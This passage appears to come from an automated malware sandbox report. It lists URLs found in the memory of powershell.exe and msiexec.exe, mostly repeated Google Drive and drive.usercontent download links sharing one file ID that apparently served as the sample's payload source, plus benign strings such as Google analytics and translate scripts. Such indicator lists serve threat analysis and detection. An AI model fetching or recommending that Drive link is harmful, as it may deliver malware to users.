      Source: powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/$h
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/cQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/cQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download:LwN
      Source: msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rLw
      Source: msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/tw
      Source: msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ
      Source: msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ1
      Source: msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ32859Z
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ3lb
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJQuON
      Source: msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJgUWzj1OH4dV11wJ
      Source: msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJgUWzj1OH4dV11wJryHo
      Source: msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJindows
      Source: msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJt
      Source: msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJx
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2793918329.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Hs
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/J~
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/O
      Source: msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782447115.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download$L
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloadBK
      Source: msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloadTM
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloadhK
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloads
      Source: msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2793918329.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/us
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/~~
      Source: powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
